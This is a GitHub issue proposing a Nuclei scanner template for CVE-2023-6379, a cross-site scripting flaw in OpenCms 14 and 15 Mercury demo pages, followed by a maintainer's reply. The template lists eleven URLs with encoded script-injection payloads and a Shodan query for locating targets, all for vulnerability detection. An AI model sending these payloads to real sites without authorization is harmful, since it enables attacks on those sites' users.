search

projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License
9.25k stars 2.63k forks source link

CVE-2023-6379 #8882

Closed msegoviag closed 9 months ago

msegoviag commented 10 months ago

Template Information:

Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the Demo 'Mercury' template. This vulnerability could allow a remote attacker to send a specially crafted JavaScript payload to a victim and partially take control of their browsing session.

POC

[redacted]

References

Nuclei Template:


info:
  name: OpenCms 14 & 15 - Cross-Site Scripting
  author: msegoviag
  severity: medium
  description: |
    Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.
  remediation: |
    Update to version OpenCMS 16
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6379
    - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2023-6379
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-6379
    cwe-id: CWE-79
  metadata:
    max-request: 2
    vendor: alkacon
    product: OpenCms
    shodan-query: title:"opencms"
  tags: cve,cve2023,opencms,xss,alkacon

http:
  - method: GET
    path:
      - '{{BaseURL}}/mercury-demo-de/tagebuch/eintraege/index.html?reloaded&page=1"%3Czzz%3E%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
      - '{{BaseURL}}/mercury-json/demo-2/list-editor/index.html?reloaded&page=3"%3Czzz%3E%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
      - '{{BaseURL}}/mercury-demo/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3"%3Czzz%3E%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
      - '{{BaseURL}}/mercury-demo/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2"%3Czzz%3E%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
      - '{{BaseURL}}/mercury-demo/lists/compact/index.html?reloaded&sort=date_desc&page=2"%3Czzz%3E%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
      - '{{BaseURL}}/mercury-demo/lists/elaborate/index.html?reloaded&sort=date_desc&page=2"%3Czzz%3E%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
      - '{{BaseURL}}/mercury-demo/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2"%3Czzz%3E%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
      - '{{BaseURL}}/mercury-demo/lists/masonry/index.html?reloaded&sort=date_asc&page=2"%3Czzz%3E%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
      - '{{BaseURL}}/mercury-demo/blog/articles/index.html?reloaded&page=2"%3Czzz%3E%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
      - '{{BaseURL}}/mercury-demo/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1'
      - '{{BaseURL}}/mercury-demo/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1"%3Czzz%3E%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - <zzz><script>alert(document.domain)</script>
        condition: or

      - type: word
        part: header
        words:
          - "Content-Type: text/html"

      - type: status
        status:
          - 200

Results

[redacted]

princechaddha commented 10 months ago

Hi @msegoviag, Thank you for taking the time to create this issue and for contributing to this project 🍻

I have updated the template and made a few changes, such as removing the demo directory. This is because the users are expected to provide the full path to the CMS, and it won't be hosted inside that directory on real targets. Thanks

You can join our discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again

Note: Please refrain from sharing vulnerable environments on GitHub. You can do so via Discord DM for template validation.